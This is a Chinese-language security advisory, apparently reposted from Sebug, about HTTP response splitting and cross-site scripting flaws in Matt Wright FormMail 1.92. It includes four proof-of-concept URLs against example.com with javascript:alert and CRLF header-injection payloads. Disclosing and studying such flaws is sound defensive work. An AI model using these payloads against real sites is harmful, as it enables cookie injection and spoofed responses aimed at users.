FormMail HTTP响应拆分和跨站脚本漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-11-02
FormMail HTTP响应拆分和跨站脚本漏洞 影响版本:
Matt Wright FormMail 1.92漏洞描述:
BUGTRAQ  ID: 34929

FormMail是一款用perl实现的基于WEB的邮件网关,可以运行于大多数Linux/Unix以及Windows等多种系统平台。

FormMail.pl模块没有正确地验证用户所提交的request和return_link_url参数,远程安全者可以通过提交恶意请求执行跨站脚本安全,或在返回给用户的响应中包含任意HTTP头。<*参考 
Francesco Ongaro (ascii@ush.it)

链接:http://secunia.com/advisories/35068/
http://marc.info/?l=bugtraq&m=124214294303546&w=2
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!foobar@example.com&amp;subject=1&amp;redirect=javascript:alert(%27USH%27);" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&amp;subject=1&amp;redirect=javascript:alert(%27USH%27);
foobar@example.com&amp;subject=1&amp;return_link_url=javascript:alert(%27USH%27);&amp;return_link_title=USH" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&amp;subject=1&amp;return_link_url=javascript:alert(%27USH%27);&amp;return_link_title=USH
foobar@example.com&amp;subject=1&amp;redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&amp;subject=1&amp;redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;
foobar@example.com&amp;subject=1&amp;redirect=http://www.example.com%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.example.com" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&amp;subject=1&amp;redirect=http://www.example.com%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.example.com
SEBUG安全建议:
 
Matt Wright
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://worldwidemart.com/